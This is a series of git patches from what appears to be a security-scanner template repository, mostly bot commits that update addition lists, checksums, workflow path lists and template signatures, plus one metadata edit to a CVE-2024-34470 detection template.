490a0046304402206251e9bc53491a3f33d6c6baefde81f328a515ad5fb4ac6471169fec1dfbb9360220567049621b968d8a03cffc3839c9104f4628777cc32a73acdb0649825eb2fad3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 12d28ce30feb0ec93afb8ab713ced63ff150b368 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:10:19 +0000 Subject: [PATCH 1558/1768] Auto Generated New Template Addition List [Thu May 30 13:10:19 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index f202846ea8..34a79fb5fc 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/exposed-panels/fortinet/fortisiem-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml +http/misconfiguration/cubebackup-setup-installer.yaml http/misconfiguration/installer/activecollab-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml @@ -29,6 +30,7 @@ http/misconfiguration/installer/invoice-ninja-installer.yaml http/misconfiguration/installer/jfa-go-installer.yaml http/misconfiguration/installer/justfans-installer.yaml http/misconfiguration/installer/librenms-installer.yaml +http/misconfiguration/installer/mura-cms-setup-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml From e02c2344870bc06937376f59c8df8c7f6d15cba9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:10:49 +0000 Subject: [PATCH 1560/1768] Auto Generated Templates Checksum [Thu May 30 13:10:49 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 579e8f0641..ab2994b0d8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4234,7 +4234,7 @@ http/exposed-panels/php-mailer.yaml:aea625363805a59d157fc0c8fbd98520a658bf37 http/exposed-panels/phpcollab-panel.yaml:00191ff5433780217091e63a42f9a512150ea763 http/exposed-panels/phpldapadmin-panel.yaml:6a326c69ae4087643893609ba63387f5f616cb80 http/exposed-panels/phpminiadmin-panel.yaml:18f7bdeebcddc43b09d75b6430ad561859f97d14 -http/exposed-panels/phpmyadmin-panel.yaml:465455c9b8ced4f37391fa62b05c96f27c8fa879 +http/exposed-panels/phpmyadmin-panel.yaml:3ceb853a63f8eb7cbf4c231b0c4f7dbb067f66e6 http/exposed-panels/phppgadmin-panel.yaml:b644fb2f3c82f4cf2e6acc48ed9502547d0dabe3 http/exposed-panels/pichome-panel.yaml:de9c307297bd6bee1395daea5bf78a75d03462c4 http/exposed-panels/piwigo-panel.yaml:3bdd638ad47c8660f72afd63183653e1bbc01788 @@ -5311,6 +5311,7 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 +http/misconfiguration/cubebackup-setup-installer.yaml:c0084ca8adbf6ed8d4251e66f507c52c616174f8 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5473,6 +5474,7 @@ http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958 http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71 http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a +http/misconfiguration/installer/mura-cms-setup-installer.yaml:401479001b7098dfdd05509b12b0937fcb3de681 http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 http/misconfiguration/installer/nginx-auto-installer.yaml:ad565c9eee92dff96cc6487522724d96386339d9 @@ -8602,7 +8604,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:24a6d6f26bc3b10881dd3b34c8829a2c4198f189 +templates-checksum.txt:9490e5bdae3725e1074a9d8651c15d9d51ce41d9 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 1d1e50642a70b639f7f0c7f7b7a69ed896b6f2c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:11:04 +0000 Subject: [PATCH 1561/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 26873904a6..e8a76f84af 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -23,6 +23,7 @@ on: - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' - 'http/exposures/tokens/wechat/wechat-secret-key.yaml' - 'http/iot/netgear-boarddataww-rce.yaml' + - 'http/misconfiguration/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' @@ -34,6 +35,7 @@ on: - 'http/misconfiguration/installer/jfa-go-installer.yaml' - 'http/misconfiguration/installer/justfans-installer.yaml' - 'http/misconfiguration/installer/librenms-installer.yaml' + - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' From 5288e7fcadffb83028b040f6ef625b5b2998d4e1 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:11:34 +0000 Subject: [PATCH 1562/1768] Auto Generated New Template Addition List [Thu May 30 13:11:34 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 34a79fb5fc..6e36481c61 100644 --- a/.new-additions +++ b/.new-additions @@ -33,6 +33,7 @@ http/misconfiguration/installer/librenms-installer.yaml http/misconfiguration/installer/mura-cms-setup-installer.yaml http/misconfiguration/installer/onlyoffice-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/pandora-fms-installer.yaml http/misconfiguration/installer/profittrailer-installer.yaml http/misconfiguration/installer/projectsend-installer.yaml http/misconfiguration/installer/snipe-it-installer.yaml From 2fd8441999be9183707039073d2f70ee08b2c467 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:11:45 +0000 Subject: [PATCH 1563/1768] Auto Generated Templates Checksum [Thu May 30 13:11:45 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ab2994b0d8..c8e7f5cea2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5493,6 +5493,7 @@ http/misconfiguration/installer/orangescrum-install.yaml:a8eed9d3051fb349be44b0c http/misconfiguration/installer/owncloud-installer-exposure.yaml:66cb802db3587a09427dc183b8df0e94ca3fe2d8 http/misconfiguration/installer/oxid-eshop-installer.yaml:f5a2e54a7f5c13e18209df8cb2830e095c83ba5c http/misconfiguration/installer/pagekit-installer.yaml:eb1972138f70ad53ae1b4ef6f5004d9470fdaee6 +http/misconfiguration/installer/pandora-fms-installer.yaml:78f905cee7803a1ef39ef1a23190a35a2bf8fcf0 http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac03565db2994d603c8537 http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08 @@ -8604,7 +8605,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9490e5bdae3725e1074a9d8651c15d9d51ce41d9 +templates-checksum.txt:855e4ff1ac258da766e247c5568bab892a99454b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From ea5125898cb4a7f6996343b946c7ce7950acf55d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:12:10 +0000 Subject: [PATCH 1564/1768] Auto Template Signing [Thu May 30 13:12:10 UTC 2024] :robot: --- http/misconfiguration/cubebackup-setup-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/cubebackup-setup-installer.yaml b/http/misconfiguration/cubebackup-setup-installer.yaml index 55b903fb1c..2850b0a3b4 100644 --- a/http/misconfiguration/cubebackup-setup-installer.yaml +++ b/http/misconfiguration/cubebackup-setup-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220128cfc82d3dff26aed49cee5aa69ca7428cd65495bf2a70cc8d405825af8f976022100bcc76a3c09d698786cd3f8071a590aa9c8b11291474ffc8fb9adf142af9a8929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5abb3e73332884179806446a7cf4d3320d2961c3 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:12:14 +0000 Subject: [PATCH 1565/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e8a76f84af..87eaaf9587 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -38,6 +38,7 @@ on: - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml' - 'http/misconfiguration/installer/onlyoffice-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' + - 'http/misconfiguration/installer/pandora-fms-installer.yaml' - 'http/misconfiguration/installer/profittrailer-installer.yaml' - 'http/misconfiguration/installer/projectsend-installer.yaml' - 'http/misconfiguration/installer/snipe-it-installer.yaml' From 8d58f6fc6a76a8bdd002a58a89e95ac29b587298 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:12:16 +0000 Subject: [PATCH 1566/1768] Auto Generated New Template Addition List [Thu May 30 13:12:16 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6e36481c61..94b253118d 100644 --- a/.new-additions +++ b/.new-additions @@ -42,6 +42,7 @@ http/misconfiguration/installer/tastyigniter-installer.yaml http/misconfiguration/installer/ubersmith-installer.yaml http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml http/misconfiguration/installer/virtual-smartzone-installer.yaml +http/misconfiguration/installer/wowonder-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml http/vulnerabilities/other/cerio-dt-rce.yaml From 9ffdf1e45268e409c4e4b0245fce92ab4505e272 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:12:41 +0000 Subject: [PATCH 1567/1768] Auto Generated Templates Checksum [Thu May 30 13:12:41 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c8e7f5cea2..00e3ab6713 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5547,6 +5547,7 @@ http/misconfiguration/installer/webtrees-install.yaml:373a89cc6c65f6d44a4b7fd764 http/misconfiguration/installer/webuzo-installer.yaml:dc4d1a58f425cb8fb42cbc5280cc2ab9cbbb991d http/misconfiguration/installer/wiki-js-installer.yaml:21c556bd08a12c651f419ccc23b69d2980c55a1c http/misconfiguration/installer/wowcms-installer.yaml:6df79c7601fd21994a52333494a91a3d653f0573 +http/misconfiguration/installer/wowonder-installer.yaml:b4ed4185d602e7c9aea4dcc2622d1e140caa5611 http/misconfiguration/installer/wp-install.yaml:f09020cd3e1b61762935c650fe0ba42d659657e9 http/misconfiguration/installer/xbackbone-installer.yaml:f5578c7d92a21b929a48e7a9569f6e00db6466b7 http/misconfiguration/installer/yzmcms-installer.yaml:cfd51c27e2bd7ce0dad274cf7d3d8a81519f6d74 @@ -8605,7 +8606,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:855e4ff1ac258da766e247c5568bab892a99454b +templates-checksum.txt:34c2abcb0998167e9f679484f57a3362db493576 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fda2fdcb9ad67df41fa344f5409a07ed27ca90db Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:13:05 +0000 Subject: [PATCH 1568/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 87eaaf9587..0dcbf6fde8 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -47,6 +47,7 @@ on: - 'http/misconfiguration/installer/ubersmith-installer.yaml' - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml' - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml' + - 'http/misconfiguration/installer/wowonder-installer.yaml' - 'http/technologies/gotweb-detect.yaml' - 'http/vulnerabilities/other/array-vpn-lfi.yaml' - 'http/vulnerabilities/other/cerio-dt-rce.yaml' From 875a36fd2d6f3ec1b9b0bfad733f4c8802fd055c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:14:27 +0000 Subject: [PATCH 1569/1768] Auto Generated New Template Addition List [Thu May 30 13:14:27 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 94b253118d..a3ac7ad463 100644 --- a/.new-additions +++ b/.new-additions @@ -20,6 +20,7 @@ http/exposures/tokens/wechat/wechat-secret-key.yaml http/iot/netgear-boarddataww-rce.yaml http/misconfiguration/cubebackup-setup-installer.yaml http/misconfiguration/installer/activecollab-installer.yaml +http/misconfiguration/installer/call-com-installer.yaml http/misconfiguration/installer/cms-made-simple-installer.yaml http/misconfiguration/installer/ejbca-enterprise-installer.yaml http/misconfiguration/installer/flarum-installer.yaml From 0df37a6c00b6606258e6e6f61b7df2abd21dccf7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:14:35 +0000 Subject: [PATCH 1570/1768] Auto Generated Templates Checksum [Thu May 30 13:14:35 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 00e3ab6713..197ce97fad 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5311,7 +5311,7 @@ http/misconfiguration/confluence/confluence-oauth-admin.yaml:1e5391747c88bfa3e3b http/misconfiguration/confluence-dashboard.yaml:e80a9c76f4cb07a076e2345877ddee3a721b5dd0 http/misconfiguration/cookies-without-httponly-secure.yaml:96433be16faef9b269fa66484b578933815e1e51 http/misconfiguration/corebos-htaccess.yaml:c292dd25e289347ac281d4ce493839827da70784 -http/misconfiguration/cubebackup-setup-installer.yaml:c0084ca8adbf6ed8d4251e66f507c52c616174f8 +http/misconfiguration/cubebackup-setup-installer.yaml:1e8262b8451a65083cc49135bb49f64bd33f5cf3 http/misconfiguration/cx-cloud-upload-detect.yaml:d971d4aa14a8b003126d9e7c15b33aa2406d963b http/misconfiguration/d-link-arbitary-fileread.yaml:502347b551dfb97a21f2b321e5de24d42cc1f5ce http/misconfiguration/database-error.yaml:dc9ac279976c76b9957baf5076fccd7722d1c9ce @@ -5411,6 +5411,7 @@ http/misconfiguration/installer/binom-installer.yaml:52fe9fec98513d2febd3133b230 http/misconfiguration/installer/bitrix24-installer.yaml:e49ccadcbb628a1ab1f2db64a2cb733aa44be3a1 http/misconfiguration/installer/blesta-installer.yaml:686fc1c3b634d6ab95ad99034ec7dcb360e7ecba http/misconfiguration/installer/businesso-installer.yaml:7e15b8f657b06411a8c1746dfae68bbb09a3dd62 +http/misconfiguration/installer/call-com-installer.yaml:4d270a0817e615dc4d4584e614c6c50abb40ba89 http/misconfiguration/installer/chamilo-installer.yaml:a0c0b5aeeb609610b3c88360075ed6dca0c7d4be http/misconfiguration/installer/circarlife-setup.yaml:a156b34f363e32ba5b727edf8e4c1334c8d7c49a http/misconfiguration/installer/clipbucket-installer.yaml:953b61e17da228a814a1ea84ac3ff2e0579a4804 @@ -8606,7 +8607,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:34c2abcb0998167e9f679484f57a3362db493576 +templates-checksum.txt:7ffc21bfacd042b65105e4d9c06adb54a08d8500 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 833d619de148a1b35f3c051876395e4eff483ff9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:15:12 +0000 Subject: [PATCH 1572/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0dcbf6fde8..2621b0c394 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -25,6 +25,7 @@ on: - 'http/iot/netgear-boarddataww-rce.yaml' - 'http/misconfiguration/cubebackup-setup-installer.yaml' - 'http/misconfiguration/installer/activecollab-installer.yaml' + - 'http/misconfiguration/installer/call-com-installer.yaml' - 'http/misconfiguration/installer/cms-made-simple-installer.yaml' - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml' - 'http/misconfiguration/installer/flarum-installer.yaml' From ba6e4cc76c3b908a56dfa5bc4f9a3bec591c0154 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:15:33 +0000 Subject: [PATCH 1574/1768] Auto Generated Templates Checksum [Thu May 30 13:15:33 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 197ce97fad..3545a23a05 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2182,7 +2182,7 @@ http/cves/2021/CVE-2021-29484.yaml:f78e59f184d5c43ff7966a2b6fba00554446b9d1 http/cves/2021/CVE-2021-29490.yaml:40b5bea457e707732739b67380abd7976c51f14d http/cves/2021/CVE-2021-29505.yaml:499c17d9f306975010f29ed644e4c232907941b4 http/cves/2021/CVE-2021-29622.yaml:79b2ae7f2667471da099f5594f532bbc00626580 -http/cves/2021/CVE-2021-29625.yaml:89de3db861b7d733e2ba3aa140262d92187a64c5 +http/cves/2021/CVE-2021-29625.yaml:6b71626492d0e4d058f7c62d229a939065b84bad http/cves/2021/CVE-2021-3002.yaml:60618324e66630690c4b85faf6a5b38817601897 http/cves/2021/CVE-2021-30049.yaml:da78546d4d231f264cf840eedd0596d543ab9453 http/cves/2021/CVE-2021-30128.yaml:5d3c104ca678614f3c0b970fd3dab9975f35878c @@ -3047,7 +3047,7 @@ http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 -http/cves/2023/CVE-2023-3345.yaml:2c12dba415df031f2c8e2718b5e3a7e7927a89c4 +http/cves/2023/CVE-2023-3345.yaml:f463a1c7cdd257be67891de77bb6ac818625db98 http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 http/cves/2023/CVE-2023-33584.yaml:b4310ef83324d4f6e1e0d74751be0f3a82f927a3 @@ -8607,7 +8607,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7ffc21bfacd042b65105e4d9c06adb54a08d8500 +templates-checksum.txt:f899afa37656c02d582deae360e340f004c2784d wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 041ed599f5eb70b2af0ef0e814a0b20e2a894a31 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:16:15 +0000 Subject: [PATCH 1575/1768] Auto Template Signing [Thu May 30 13:16:15 UTC 2024] :robot: --- http/misconfiguration/installer/call-com-installer.yaml | 1 + http/misconfiguration/installer/mura-cms-setup-installer.yaml | 1 + http/misconfiguration/installer/pandora-fms-installer.yaml | 1 + http/misconfiguration/installer/wowonder-installer.yaml | 1 + 4 files changed, 4 insertions(+) diff --git a/http/misconfiguration/installer/call-com-installer.yaml b/http/misconfiguration/installer/call-com-installer.yaml index 75c0bb2f99..fa9061a8a2 100644 --- a/http/misconfiguration/installer/call-com-installer.yaml +++ b/http/misconfiguration/installer/call-com-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 490a004630440220279f9da2572a41913a0eb3bf60b546901afd18ad7278c3fa0d440bc58b60d39702200505b5407d2986b988c9a939e0294228166102d509b4fc3f60c287a81143c523:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/mura-cms-setup-installer.yaml b/http/misconfiguration/installer/mura-cms-setup-installer.yaml index 97a45a968f..b5cf256193 100644 --- a/http/misconfiguration/installer/mura-cms-setup-installer.yaml +++ b/http/misconfiguration/installer/mura-cms-setup-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502202cb137965db3e399264def6e54d44679dc44d0d1cef4ffa91514a291af287439022100c78b53b7a3cf5bb8cebcdefa23b6d1c2ce8985e2b4bd5a2087920d9204b17a0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/pandora-fms-installer.yaml b/http/misconfiguration/installer/pandora-fms-installer.yaml index 4592bf3ccc..c70fc9f577 100644 --- a/http/misconfiguration/installer/pandora-fms-installer.yaml +++ b/http/misconfiguration/installer/pandora-fms-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100fdb6af97358f0ce10670b4ef73349b318f49418f1ba095e0206a5527979a0a07022100f0435e94a7773c296cbf81ceb18e57fab50b9306573b92b83f7db2dac1770716:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/wowonder-installer.yaml b/http/misconfiguration/installer/wowonder-installer.yaml index a038f43ab2..9a5b3eb9f6 100644 --- a/http/misconfiguration/installer/wowonder-installer.yaml +++ b/http/misconfiguration/installer/wowonder-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221009a5a2cc204c9ff35aebce83e319cd2c22ad4bbd6672b60facc2358c145525f7d022100fa304b531230e4c25c03410b6026764a4bbf5dd944643c0ad90c141bce68c692:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 82fed9e30622042443ed9bcf1e58212efa5ce3ac Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 30 May 2024 18:56:04 +0530 Subject: [PATCH 1576/1768] added flow --- http/cves/2024/CVE-2024-34470.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/http/cves/2024/CVE-2024-34470.yaml b/http/cves/2024/CVE-2024-34470.yaml index 5debe0b30e..84eaac19f9 100644 --- a/http/cves/2024/CVE-2024-34470.yaml +++ b/http/cves/2024/CVE-2024-34470.yaml @@ -10,6 +10,7 @@ info: - https://github.com/osvaldotenorio/CVE-2024-34470 - https://github.com/nomi-sec/PoC-in-GitHub - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-34470 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -17,10 +18,13 @@ info: epss-score: 0.00043 epss-percentile: 0.0866 metadata: + verified: true max-request: 1 fofa-query: "mailinspector/public" tags: cve,cve2024,lfi,mailinspector,hsc +flow: http(1) && http(2) + http: - method: GET path: From 9b1128b88f88151636b930f3da00da2388dd1077 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 30 May 2024 13:28:58 +0000 Subject: [PATCH 1577/1768] Auto Generated New Template Addition List [Thu May 30 13:28:58 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a3ac7ad463..a35c11841a 100644 --- a/.new-additions +++ b/.new-additions @@ -6,6 +6,7 @@ http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-24919.yaml +http/cves/2024/CVE-2024-34470.yaml http/cves/2024/CVE-2024-3495.yaml http/cves/2024/CVE-2024-5230.yaml http/default-logins/ampjuke-default-login.yaml From 50dd2d9d4721cbe9a96921d234137c88983900fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 May 2024 13:29:10 +0000 Subject: [PATCH 1578/1768] Auto Generated Templates Checksum [Thu May 30 13:29:10 UTC 2024] :robot: --- templates-checksum.txt | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3545a23a05..af30bcac10 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3309,6 +3309,7 @@ http/cves/2024/CVE-2024-33288.yaml:021f1910a0468103d59167ac39fc9cf77f246bab http/cves/2024/CVE-2024-33575.yaml:ad19d994ed8f29c8ffca72103c5419713853271b http/cves/2024/CVE-2024-33724.yaml:22f067dc8bffa65e58284ba200cb9d7abb06d0d0 http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c +http/cves/2024/CVE-2024-34470.yaml:b59fc0e9bbeff6177b5d37ddad097eebdc0e0ae4 http/cves/2024/CVE-2024-3495.yaml:1f4e6d704c91902aa02887883d46718b45f87654 http/cves/2024/CVE-2024-4040.yaml:378a6ad71096d7285f0d1b2b51e2daee83e19a82 http/cves/2024/CVE-2024-4348.yaml:8c93845e16310b707885c81024088d1eb3d99f0b @@ -5411,7 +5412,7 @@ http/misconfiguration/installer/binom-installer.yaml:52fe9fec98513d2febd3133b230 http/misconfiguration/installer/bitrix24-installer.yaml:e49ccadcbb628a1ab1f2db64a2cb733aa44be3a1 